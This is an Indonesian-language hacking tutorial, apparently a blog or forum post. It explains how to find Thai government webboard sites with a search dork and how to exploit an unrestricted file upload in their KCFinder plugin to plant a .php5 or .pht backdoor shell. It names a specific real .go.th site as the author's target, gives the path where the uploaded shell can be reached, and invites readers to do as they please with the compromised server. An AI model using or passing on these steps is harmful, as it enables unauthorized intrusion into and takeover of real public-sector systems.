-
Hai Sobat.
Saya ikal,
Disini saya akan share sesuatu nih.
-
Okeh kita langsung masuk aja kepembahasannya ya,
Bahan :
- Dork : intitle:webboard site:go.th
"by Allweb Technology"
- Shell backdoor dengan extensi .php5
- Exploit :
https://localhost/webboard/plugins/editors/kcfinder/browse.php
https://localhost/[path]/webboard/plugins/editors/kcfinder/browse.php
Disini saya sudah mempunyai target sendiri yah, target saya beralamatkan http://sakarat.go.th//webboard/plugins/editors/kcfinder/browse.php
Disini vulnerabilitynya adalah unrestricted file upload ya, jadi kita tinggal upload shell saja. Kalian klik button yang bertuliskan Upload dan pilih shell backdoor extensi .php5 kalian
Jika berhasil terupload, nama shell kalian akan muncul dibarisan situ :D. Lalu sekarang kita tinggal akses saja shell backdoor yang barusan tadi kita upload yaitu di path
https://localhost/webboard/images/files/YourShell.php5
https://localhost/[path]/webboard/images/files/YourShell.php5
Taraaaa... Kalian bebas mau diapain tuh server ya :D. Dan jika extension .php5 ga work, kalian bisa upload shell dengan extensi .pht or more :D.
Thanks
See U
